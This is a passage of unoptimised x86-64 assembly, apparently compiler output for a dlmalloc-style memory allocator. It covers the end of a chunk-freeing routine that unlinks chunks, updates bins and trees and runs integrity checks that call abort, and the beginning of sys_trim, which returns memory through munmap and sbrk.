## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -358(%rbp) ## 1-byte Spill
jb LBB4_34
## %bb.32:
movq -104(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -80(%rbp), %rcx
movb %al, -358(%rbp) ## 1-byte Spill
jne LBB4_34
## %bb.33:
movq -96(%rbp), %rax
movq 16(%rax), %rax
cmpq -80(%rbp), %rax
sete %al
movb %al, -358(%rbp) ## 1-byte Spill
LBB4_34:
movb -358(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_36
## %bb.35:
movq -96(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 24(%rax)
movq -104(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_37
LBB4_36:
callq _abort
LBB4_37:
jmp LBB4_50
LBB4_38:
movq -80(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -112(%rbp)
movq 40(%rax), %rax
movq %rax, -96(%rbp)
cmpq $0, %rax
jne LBB4_40
## %bb.39:
movq -80(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -112(%rbp)
movq 32(%rax), %rax
movq %rax, -96(%rbp)
cmpq $0, %rax
je LBB4_49
LBB4_40:
jmp LBB4_41
LBB4_41: ## =>This Inner Loop Header: Depth=1
movq -96(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -120(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -359(%rbp) ## 1-byte Spill
jne LBB4_43
## %bb.42: ## in Loop: Header=BB4_41 Depth=1
movq -96(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -120(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -359(%rbp) ## 1-byte Spill
LBB4_43: ## in Loop: Header=BB4_41 Depth=1
movb -359(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB4_44
jmp LBB4_45
LBB4_44: ## in Loop: Header=BB4_41 Depth=1
movq -120(%rbp), %rax
movq %rax, -112(%rbp)
movq (%rax), %rax
movq %rax, -96(%rbp)
jmp LBB4_41
LBB4_45:
movq -112(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_47
## %bb.46:
movq -112(%rbp), %rax
movq $0, (%rax)
jmp LBB4_48
LBB4_47:
callq _abort
LBB4_48:
jmp LBB4_49
LBB4_49:
jmp LBB4_50
LBB4_50:
cmpq $0, -88(%rbp)
je LBB4_78
## %bb.51:
movq -80(%rbp), %rax
movl 56(%rax), %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $600, %rax ## imm = 0x258
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -128(%rbp)
movq -80(%rbp), %rax
movq -128(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB4_55
## %bb.52:
movq -96(%rbp), %rax
movq -128(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB4_54
## %bb.53:
movq -80(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_+4(%rip), %eax
movl %eax, __gm_+4(%rip)
LBB4_54:
jmp LBB4_62
LBB4_55:
movq -88(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_60
## %bb.56:
movq -88(%rbp), %rax
movq 32(%rax), %rax
cmpq -80(%rbp), %rax
jne LBB4_58
## %bb.57:
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB4_59
LBB4_58:
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 40(%rax)
LBB4_59:
jmp LBB4_61
LBB4_60:
callq _abort
LBB4_61:
jmp LBB4_62
LBB4_62:
cmpq $0, -96(%rbp)
je LBB4_77
## %bb.63:
movq -96(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_75
## %bb.64:
movq -88(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 48(%rax)
movq -80(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -136(%rbp)
cmpq $0, %rax
je LBB4_69
## %bb.65:
movq -136(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_67
## %bb.66:
movq -136(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 32(%rax)
movq -96(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB4_68
LBB4_67:
callq _abort
LBB4_68:
jmp LBB4_69
LBB4_69:
movq -80(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
je LBB4_74
## %bb.70:
movq -144(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_72
## %bb.71:
movq -144(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 40(%rax)
movq -96(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB4_73
LBB4_72:
callq _abort
LBB4_73:
jmp LBB4_74
LBB4_74:
jmp LBB4_76
LBB4_75:
callq _abort
LBB4_76:
jmp LBB4_77
LBB4_77:
jmp LBB4_78
LBB4_78:
jmp LBB4_79
LBB4_79:
jmp LBB4_83
LBB4_80:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $3, %rax
jne LBB4_82
## %bb.81:
movq -24(%rbp), %rax
movq %rax, __gm_+8(%rip)
movq -32(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
jmp LBB4_214
LBB4_82:
jmp LBB4_83
LBB4_83:
jmp LBB4_85
LBB4_84:
jmp LBB4_213
LBB4_85:
jmp LBB4_86
LBB4_86:
jmp LBB4_87
LBB4_87:
movq -16(%rbp), %rcx
movq -32(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq %rdx, %rcx
movb %al, -360(%rbp) ## 1-byte Spill
jae LBB4_89
## %bb.88:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $1, %rax
cmpq $0, %rax
setne %al
movb %al, -360(%rbp) ## 1-byte Spill
LBB4_89:
movb -360(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_211
## %bb.90:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $2, %rax
cmpq $0, %rax
jne LBB4_172
## %bb.91:
movq -32(%rbp), %rax
cmpq __gm_+40(%rip), %rax
jne LBB4_97
## %bb.92:
movq -24(%rbp), %rax
addq __gm_+16(%rip), %rax
movq %rax, __gm_+16(%rip)
movq %rax, -152(%rbp)
movq -16(%rbp), %rax
movq %rax, __gm_+40(%rip)
movq -152(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
cmpq __gm_+32(%rip), %rax
jne LBB4_94
## %bb.93:
movq $0, __gm_+32(%rip)
movq $0, __gm_+8(%rip)
LBB4_94:
movq -152(%rbp), %rax
cmpq __gm_+48(%rip), %rax
jbe LBB4_96
## %bb.95:
leaq __gm_(%rip), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _sys_trim
LBB4_96:
jmp LBB4_214
LBB4_97:
movq -32(%rbp), %rax
cmpq __gm_+32(%rip), %rax
jne LBB4_99
## %bb.98:
movq -24(%rbp), %rax
addq __gm_+8(%rip), %rax
movq %rax, __gm_+8(%rip)
movq %rax, -160(%rbp)
movq -16(%rbp), %rax
movq %rax, __gm_+32(%rip)
movq -160(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -160(%rbp), %rdx
movq -16(%rbp), %rax
movq -160(%rbp), %rcx
movq %rdx, (%rax,%rcx)
jmp LBB4_214
LBB4_99:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -168(%rbp)
movq -168(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -168(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB4_118
## %bb.100:
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -176(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -184(%rbp)
movq -168(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -188(%rbp)
movq -176(%rbp), %rcx
movl -188(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
leaq __gm_(%rip), %rdx
addq $72, %rdx
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -361(%rbp) ## 1-byte Spill
je LBB4_104
## %bb.101:
movq -176(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -362(%rbp) ## 1-byte Spill
jb LBB4_103
## %bb.102:
movq -176(%rbp), %rax
movq 24(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -362(%rbp) ## 1-byte Spill
LBB4_103:
movb -362(%rbp), %al ## 1-byte Reload
movb %al, -361(%rbp) ## 1-byte Spill
LBB4_104:
movb -361(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_116
## %bb.105:
movq -184(%rbp), %rax
cmpq -176(%rbp), %rax
jne LBB4_107
## %bb.106:
movl -188(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB4_115
LBB4_107:
movq -184(%rbp), %rcx
movl -188(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
leaq __gm_(%rip), %rdx
addq $72, %rdx
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -363(%rbp) ## 1-byte Spill
je LBB4_111
## %bb.108:
movq -184(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -364(%rbp) ## 1-byte Spill
jb LBB4_110
## %bb.109:
movq -184(%rbp), %rax
movq 16(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -364(%rbp) ## 1-byte Spill
LBB4_110:
movb -364(%rbp), %al ## 1-byte Reload
movb %al, -363(%rbp) ## 1-byte Spill
LBB4_111:
movb -363(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_113
## %bb.112:
movq -184(%rbp), %rcx
movq -176(%rbp), %rax
movq %rcx, 24(%rax)
movq -176(%rbp), %rcx
movq -184(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_114
LBB4_113:
callq _abort
LBB4_114:
jmp LBB4_115
LBB4_115:
jmp LBB4_117
LBB4_116:
callq _abort
LBB4_117:
jmp LBB4_167
LBB4_118:
movq -32(%rbp), %rax
movq %rax, -200(%rbp)
movq -200(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -208(%rbp)
movq -200(%rbp), %rax
movq 24(%rax), %rax
cmpq -200(%rbp), %rax
je LBB4_126
## %bb.119:
movq -200(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -224(%rbp)
movq -200(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -216(%rbp)
movq -224(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -365(%rbp) ## 1-byte Spill
jb LBB4_122
## %bb.120:
movq -224(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -200(%rbp), %rcx
movb %al, -365(%rbp) ## 1-byte Spill
jne LBB4_122
## %bb.121:
movq -216(%rbp), %rax
movq 16(%rax), %rax
cmpq -200(%rbp), %rax
sete %al
movb %al, -365(%rbp) ## 1-byte Spill
LBB4_122:
movb -365(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_124
## %bb.123:
movq -216(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_125
LBB4_124:
callq _abort
LBB4_125:
jmp LBB4_138
LBB4_126:
movq -200(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -232(%rbp)
movq 40(%rax), %rax
movq %rax, -216(%rbp)
cmpq $0, %rax
jne LBB4_128
## %bb.127:
movq -200(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -232(%rbp)
movq 32(%rax), %rax
movq %rax, -216(%rbp)
cmpq $0, %rax
je LBB4_137
LBB4_128:
jmp LBB4_129
LBB4_129: ## =>This Inner Loop Header: Depth=1
movq -216(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -240(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -366(%rbp) ## 1-byte Spill
jne LBB4_131
## %bb.130: ## in Loop: Header=BB4_129 Depth=1
movq -216(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -240(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -366(%rbp) ## 1-byte Spill
LBB4_131: ## in Loop: Header=BB4_129 Depth=1
movb -366(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB4_132
jmp LBB4_133
LBB4_132: ## in Loop: Header=BB4_129 Depth=1
movq -240(%rbp), %rax
movq %rax, -232(%rbp)
movq (%rax), %rax
movq %rax, -216(%rbp)
jmp LBB4_129
LBB4_133:
movq -232(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_135
## %bb.134:
movq -232(%rbp), %rax
movq $0, (%rax)
jmp LBB4_136
LBB4_135:
callq _abort
LBB4_136:
jmp LBB4_137
LBB4_137:
jmp LBB4_138
LBB4_138:
cmpq $0, -208(%rbp)
je LBB4_166
## %bb.139:
movq -200(%rbp), %rax
movl 56(%rax), %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $600, %rax ## imm = 0x258
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -248(%rbp)
movq -200(%rbp), %rax
movq -248(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB4_143
## %bb.140:
movq -216(%rbp), %rax
movq -248(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB4_142
## %bb.141:
movq -200(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_+4(%rip), %eax
movl %eax, __gm_+4(%rip)
LBB4_142:
jmp LBB4_150
LBB4_143:
movq -208(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_148
## %bb.144:
movq -208(%rbp), %rax
movq 32(%rax), %rax
cmpq -200(%rbp), %rax
jne LBB4_146
## %bb.145:
movq -216(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB4_147
LBB4_146:
movq -216(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 40(%rax)
LBB4_147:
jmp LBB4_149
LBB4_148:
callq _abort
LBB4_149:
jmp LBB4_150
LBB4_150:
cmpq $0, -216(%rbp)
je LBB4_165
## %bb.151:
movq -216(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_163
## %bb.152:
movq -208(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 48(%rax)
movq -200(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -256(%rbp)
cmpq $0, %rax
je LBB4_157
## %bb.153:
movq -256(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_155
## %bb.154:
movq -256(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 32(%rax)
movq -216(%rbp), %rcx
movq -256(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB4_156
LBB4_155:
callq _abort
LBB4_156:
jmp LBB4_157
LBB4_157:
movq -200(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -264(%rbp)
cmpq $0, %rax
je LBB4_162
## %bb.158:
movq -264(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_160
## %bb.159:
movq -264(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 40(%rax)
movq -216(%rbp), %rcx
movq -264(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB4_161
LBB4_160:
callq _abort
LBB4_161:
jmp LBB4_162
LBB4_162:
jmp LBB4_164
LBB4_163:
callq _abort
LBB4_164:
jmp LBB4_165
LBB4_165:
jmp LBB4_166
LBB4_166:
jmp LBB4_167
LBB4_167:
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -16(%rbp), %rax
cmpq __gm_+32(%rip), %rax
jne LBB4_169
## %bb.168:
movq -24(%rbp), %rax
movq %rax, __gm_+8(%rip)
jmp LBB4_214
LBB4_169:
jmp LBB4_170
LBB4_170:
jmp LBB4_171
LBB4_171:
jmp LBB4_173
LBB4_172:
movq -32(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
LBB4_173:
movq -24(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB4_181
## %bb.174:
movq -24(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -268(%rbp)
movl -268(%rbp), %eax
shll $1, %eax
movl %eax, %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $72, %rax
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -280(%rbp)
movq -280(%rbp), %rax
movq %rax, -288(%rbp)
movl __gm_(%rip), %eax
movl -268(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB4_176
## %bb.175:
movl -268(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
orl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB4_180
LBB4_176:
movq -280(%rbp), %rax
movq 16(%rax), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_178
## %bb.177:
movq -280(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -288(%rbp)
jmp LBB4_179
LBB4_178:
callq _abort
LBB4_179:
jmp LBB4_180
LBB4_180:
movq -16(%rbp), %rcx
movq -280(%rbp), %rax
movq %rcx, 16(%rax)
movq -16(%rbp), %rcx
movq -288(%rbp), %rax
movq %rcx, 24(%rax)
movq -288(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 16(%rax)
movq -280(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
jmp LBB4_210
LBB4_181:
movq -16(%rbp), %rax
movq %rax, -296(%rbp)
movq -24(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -312(%rbp)
cmpl $0, -312(%rbp)
jne LBB4_183
## %bb.182:
movl $0, -308(%rbp)
jmp LBB4_187
LBB4_183:
cmpl $65535, -312(%rbp) ## imm = 0xFFFF
jbe LBB4_185
## %bb.184:
movl $31, -308(%rbp)
jmp LBB4_186
LBB4_185:
movl -312(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -316(%rbp)
movl -316(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -24(%rbp), %rdx
movl -316(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -308(%rbp)
LBB4_186:
jmp LBB4_187
LBB4_187:
movl -308(%rbp), %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $600, %rax ## imm = 0x258
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -304(%rbp)
movl -308(%rbp), %ecx
movq -296(%rbp), %rax
movl %ecx, 56(%rax)
movq -296(%rbp), %rax
movq $0, 40(%rax)
movq -296(%rbp), %rax
movq $0, 32(%rax)
movl __gm_+4(%rip), %eax
movl -308(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB4_189
## %bb.188:
movl -308(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
orl __gm_+4(%rip), %eax
movl %eax, __gm_+4(%rip)
movq -296(%rbp), %rcx
movq -304(%rbp), %rax
movq %rcx, (%rax)
movq -304(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 48(%rax)
movq -296(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_207
LBB4_189:
movq -304(%rbp), %rax
movq (%rax), %rax
movq %rax, -328(%rbp)
movq -24(%rbp), %rax
movq %rax, -376(%rbp) ## 8-byte Spill
cmpl $31, -308(%rbp)
jne LBB4_191
## %bb.190:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -384(%rbp) ## 8-byte Spill
jmp LBB4_192
LBB4_191:
movl -308(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -384(%rbp) ## 8-byte Spill
LBB4_192:
movq -376(%rbp), %rax ## 8-byte Reload
movq -384(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -336(%rbp)
LBB4_193: ## =>This Inner Loop Header: Depth=1
movq -328(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -24(%rbp), %rax
je LBB4_200
## %bb.194: ## in Loop: Header=BB4_193 Depth=1
movq -328(%rbp), %rax
addq $32, %rax
movq -336(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -344(%rbp)
movq -336(%rbp), %rax
shlq $1, %rax
movq %rax, -336(%rbp)
movq -344(%rbp), %rax
cmpq $0, (%rax)
je LBB4_196
## %bb.195: ## in Loop: Header=BB4_193 Depth=1
movq -344(%rbp), %rax
movq (%rax), %rax
movq %rax, -328(%rbp)
jmp LBB4_199
LBB4_196:
movq -344(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_198
## %bb.197:
movq -296(%rbp), %rcx
movq -344(%rbp), %rax
movq %rcx, (%rax)
movq -328(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 48(%rax)
movq -296(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_206
LBB4_198:
callq _abort
LBB4_199: ## in Loop: Header=BB4_193 Depth=1
jmp LBB4_205
LBB4_200:
movq -328(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -352(%rbp)
movq -328(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -385(%rbp) ## 1-byte Spill
jb LBB4_202
## %bb.201:
movq -352(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
movb %al, -385(%rbp) ## 1-byte Spill
LBB4_202:
movb -385(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_204
## %bb.203:
movq -296(%rbp), %rcx
movq -352(%rbp), %rax
movq %rcx, 24(%rax)
movq -328(%rbp), %rax
movq %rcx, 16(%rax)
movq -352(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
movq -328(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq $0, 48(%rax)
jmp LBB4_206
LBB4_204:
callq _abort
LBB4_205: ## in Loop: Header=BB4_193 Depth=1
jmp LBB4_193
LBB4_206:
jmp LBB4_207
LBB4_207:
movq __gm_+56(%rip), %rax
addq $-1, %rax
movq %rax, __gm_+56(%rip)
cmpq $0, %rax
jne LBB4_209
## %bb.208:
leaq __gm_(%rip), %rdi
callq _release_unused_segments
LBB4_209:
jmp LBB4_210
LBB4_210:
jmp LBB4_214
LBB4_211:
jmp LBB4_212
LBB4_212:
jmp LBB4_213
LBB4_213:
callq _abort
LBB4_214:
jmp LBB4_215
LBB4_215:
addq $400, %rsp ## imm = 0x190
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function sys_trim
_sys_trim: ## @sys_trim
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -81(%rbp) ## 1-byte Spill
jne LBB5_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -81(%rbp) ## 1-byte Spill
LBB5_2:
movb -81(%rbp), %al ## 1-byte Reload
cmpq $-128, -16(%rbp)
jae LBB5_29
## %bb.3:
movq -8(%rbp), %rax
cmpq $0, 40(%rax)
je LBB5_29
## %bb.4:
movq -16(%rbp), %rax
addq $80, %rax
movq %rax, -16(%rbp)
movq -8(%rbp), %rax
movq 16(%rax), %rax
cmpq -16(%rbp), %rax
jbe LBB5_25
## %bb.5:
movq _mparams+16(%rip), %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
movq 16(%rax), %rax
subq -16(%rbp), %rax
movq -32(%rbp), %rcx
subq $1, %rcx
addq %rcx, %rax
xorl %ecx, %ecx
movl %ecx, %edx
divq -32(%rbp)
subq $1, %rax
imulq -32(%rbp), %rax
movq %rax, -40(%rbp)
movq -8(%rbp), %rdi
movq -8(%rbp), %rax
movq 40(%rax), %rsi
callq _segment_holding
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movl 24(%rax), %eax
andl $8, %eax
cmpl $0, %eax
jne LBB5_22
## %bb.6:
movq -48(%rbp), %rax
movl 24(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
cmpq $0, %rax
je LBB5_13
## %bb.7:
movq -48(%rbp), %rax
movq 8(%rax), %rax
cmpq -40(%rbp), %rax
jb LBB5_12
## %bb.8:
movq -8(%rbp), %rdi
movq -48(%rbp), %rsi
callq _has_segment_link
cmpl $0, %eax
jne LBB5_12
## %bb.9:
movq -48(%rbp), %rax
movq 8(%rax), %rax
subq -40(%rbp), %rax
movq %rax, -56(%rbp)
movq -48(%rbp), %rax
movq (%rax), %rdi
addq -56(%rbp), %rdi
movq -40(%rbp), %rsi
callq _munmap
cmpl $0, %eax
jne LBB5_11
## %bb.10:
movq -40(%rbp), %rax
movq %rax, -24(%rbp)
LBB5_11:
jmp LBB5_12
LBB5_12:
jmp LBB5_21
LBB5_13:
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -40(%rbp)
jb LBB5_15
## %bb.14:
movabsq $-9223372036854775808, %rax ## imm = 0x8000000000000000
subq -32(%rbp), %rax
movq %rax, -40(%rbp)
LBB5_15:
xorl %edi, %edi
callq _sbrk
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
movq -48(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
jne LBB5_20
## %bb.16:
xorl %eax, %eax
## kill: def $rax killed $eax
subq -40(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq %rax, -72(%rbp)
xorl %edi, %edi
callq _sbrk
